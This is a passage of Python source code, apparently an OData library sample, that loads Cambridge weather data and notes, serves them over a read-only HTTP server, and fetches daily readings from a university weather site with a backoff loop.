date=iso.Date.from_str(
note_words[1]).offset(days=1),
time=iso.Time(hour=0, minute=0, second=0))
note['EndDate'].set_from_value(end)
note['Details'].set_from_value(
' '.join(note_words[2:]))
collection.insert_entity(note)
# now find the data points that match
data.set_filter(
core.CommonExpression.from_str(
"TimePoint ge datetime'%s' and "
"TimePoint lt datetime'%s'" %
(to_text(start), to_text(end))))
for data_point in data.values():
# use values, not itervalues to avoid this bug
# in Python 2.7 http://bugs.python.org/issue10513
data_point['Note'].bind_entity(note)
data.update_entity(data_point)
id = id + 1
with weather_notes.open() as collection:
collection.set_orderby(
core.CommonExpression.orderby_from_str('StartDate desc'))
for e in collection.itervalues():
with e['DataPoints'].open() as affectedData:
output(
"%s-%s: %s (%i data points affected)" %
(to_text(e['StartDate'].value),
to_text(e['EndDate'].value),
e['Details'].value, len(affectedData)))
def dry_run():
doc = load_metadata()
InMemoryEntityContainer(
doc.root.DataServices['WeatherSchema.CambridgeWeather'])
weather_data = doc.root.DataServices[
'WeatherSchema.CambridgeWeather.DataPoints']
weather_notes = doc.root.DataServices[
'WeatherSchema.CambridgeWeather.Notes']
load_data(weather_data, SAMPLE_DIR)
load_notes(weather_notes, 'weathernotes.txt', weather_data)
return doc.root.DataServices['WeatherSchema.CambridgeWeather']
def test_model(drop=False):
"""Read and write some key value pairs"""
doc = load_metadata()
make_container(doc, drop)
weather_data = doc.root.DataServices[
'WeatherSchema.CambridgeWeather.DataPoints']
weather_notes = doc.root.DataServices[
'WeatherSchema.CambridgeWeather.Notes']
if drop:
load_data(weather_data, SAMPLE_DIR)
load_notes(weather_notes, 'weathernotes.txt', weather_data)
with weather_data.open() as collection:
collection.set_orderby(
core.CommonExpression.orderby_from_str('WindSpeedMax desc'))
collection.set_page(30)
for e in collection.iterpage():
note = e['Note'].get_entity()
if e['WindSpeedMax'] and e['Pressure']:
output(
"%s: Pressure %imb, max wind speed %0.1f knots "
"(%0.1f mph); %s" % (
to_text(e['TimePoint'].value), e['Pressure'].value,
e['WindSpeedMax'].value,
e['WindSpeedMax'].value * 1.15078,
note['Details'] if note is not None else ""))
def run_weather_server(weather_app=None):
"""Starts the web server running"""
server = make_server('', SERVICE_PORT, weather_app)
logging.info("HTTP server on port %i running" % SERVICE_PORT)
# Respond to requests until process is killed
server.serve_forever()
def run_weather_loader(container=None, max_load=30,
not_before="19950630T000000"):
"""Monitors the DTG website for new values
container
The EntityContainer containing the weather data.
max_load
The maximum number of days worth of data to load. When setting
up a new server this determines the rate at which the new server
will catch up.
This function is designed to be called once per day, it loads
historical data from the DTG website one day at a time up to a
maximum of max_load. If the data can't be loaded, e.g., because the
DTG site is not reachable, then the method backs off until it has
waited for approximately 1 hour after which it gives up. Therefore,
you should always set max_load greater than 1 to ensure that the
method catches up with the data after an outage.
The earliest date it will load is 30th June 1995, the latest date it
will load is yesterday."""
if container is None:
doc = load_metadata()
container = make_container(doc)
client = http.Client()
weather_data = container['DataPoints']
dtg = "http://www.cl.cam.ac.uk/research/dtg/weather/daily-text.cgi?%s"
not_before_point = iso.TimePoint.from_str(not_before)
with weather_data.open() as collection:
collection.set_orderby(
core.CommonExpression.orderby_from_str('TimePoint desc'))
sleep_interval = 60
collection.set_page(1)
last_point = list(collection.iterpage())
if last_point:
last_point = last_point[0]['TimePoint'].value
if last_point < not_before_point:
last_point = not_before_point
else:
last_point = not_before_point
next_day = last_point.date
n_loaded = 0
while n_loaded < max_load:
today = iso.TimePoint.from_now_utc().date
if next_day < today:
# Load in next_day
logging.info("Requesting data for %s", str(next_day))
century, year, month, day = next_day.get_calendar_day()
request = http.ClientRequest(dtg % str(next_day))
client.process_request(request)
if request.status == 200:
# process this file and move on to the next day
f = io.BytesIO(request.res_body)
load_data_from_file(
weather_data, f, century * 100 + year, month, day)
n_loaded += 1
next_day = next_day.offset(days=1)
if sleep_interval > 10:
sleep_interval = sleep_interval // 2
else:
# back off and try again
sleep_interval = sleep_interval * 2
else:
# we're done for today
client.idle_cleanup(0)
break
client.idle_cleanup(0)
if sleep_interval > 3600:
# site might be down, postpone
break
time.sleep(sleep_interval)
def main():
"""Executed when we are launched"""
doc = load_metadata()
make_container(doc)
server = ReadOnlyServer(serviceRoot=SERVICE_ROOT)
server.SetModel(doc)
t = threading.Thread(
target=run_weather_server, kwargs={'weather_app': server})
t.setDaemon(True)
t.start()
logging.info("Starting HTTP server on %s" % SERVICE_ROOT)
t.join()
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.